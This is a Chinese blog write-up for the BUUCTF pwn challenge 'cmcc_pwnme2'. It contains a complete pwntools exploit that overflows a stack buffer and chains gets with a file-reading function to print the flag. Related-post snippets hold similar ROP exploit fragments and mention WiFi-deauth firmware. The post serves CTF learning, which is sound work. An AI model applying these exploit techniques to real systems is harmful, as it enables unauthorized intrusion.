[BUUCTF]-PWN:cmcc_pwnme2解析

于 2024-01-31 14:40:58 发布
阅读量264 收藏
点赞数 3
分类专栏: PWN 文章标签: 前端 linux 数据库 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/135952180
版权

保护

ida

完整exp:

from pwn import*
context(log_level='debug')
#p=remote('node5.buuoj.cn',26964)
p=process('./pwnme2')
addhome=0x8048644
addflag=0x8048682
getfile=0x80485CB
main=0x80486F8
pop_ebp=0x8048680
ret=0x80483f2
pop_ebx=0x8048409
pop_edi_ebp=0x804867f
strings=0x804A060
gets=0x8048440

payload=b'a'*(0x6c+4)+p32(gets)+p32(getfile)+p32(strings)
p.sendlineafter(b'Please input:',payload)
p.sendline(b'flag')
p.interactive()

补充点1:为啥填充0x6c+4而不是0x88+4?动态调试可以知道ebp+4那个地方存了一个指针,在后续跳转中会用到,即使在那个地方填上地址,依然会报错,所以只能用strcpy来覆盖返回地址。

补充点2:这道题应该不能用原本的解法来解了,因为原本题目里的是flag1,所以只能自己手动输入flag。

clxhzg
关注
专栏目录
cmcc pwnme2
pondzhang的专栏
12-25 325
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 986
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
cmcc_pwnme2
m0_61948538的博客
02-01 205
栈溢出基础传参题
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 1001
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1072
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
BUUCTF之“cmcc_pwnme2”做题简单记录
Probeginner的博客
12-11 2640
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息。 from pwn import * p = remote('node4.buuoj.cn',25488) elf=ELF('./pwnme2') exec_string=0x080485cb string=0x0804a060 gets=elf.sym['gets'] p.recvuntil('Please input:\n') payload=b'a'*(0x6c+4)+p32(gets)+p32(.
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 574
buuctf pwn 第三页
pwnme2pwnme3的wp
一个码农的笔记
10-15 1414
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 713
buuctf wp
PWN-PRACTICE-BUUCTF-19
P1umH0的博客
09-07 139
PWN-PRACTICE-BUUCTF-19hitcontraining_bambooboxpicoctf_2018_shellcodenpuctf_2020_easyheapcmcc_pwnme2 hitcontraining_bamboobox unlink,参考:hitcontraining_bamboobox 堆技巧 unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 624
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 697
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
BUUCTF刷题4
m0_51251108的博客
10-30 342
题目:hitcon2014_stkof:pwnable_hacknote:ciscn_2019_s_9:picoctf_2018_shellcode:npuctf_2020_easyheap:cmcc_pwnme2:x_ctf_b0verfl0w:picoctf_2018_leak_me:suctf_2018_basic pwncmcc_pwnme1: hitcon2014_stkof: 参考师傅:(4条消息) 好好说话之unlink_hollk’s blog-CSDN博客_好好说话之unlink 利用方
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值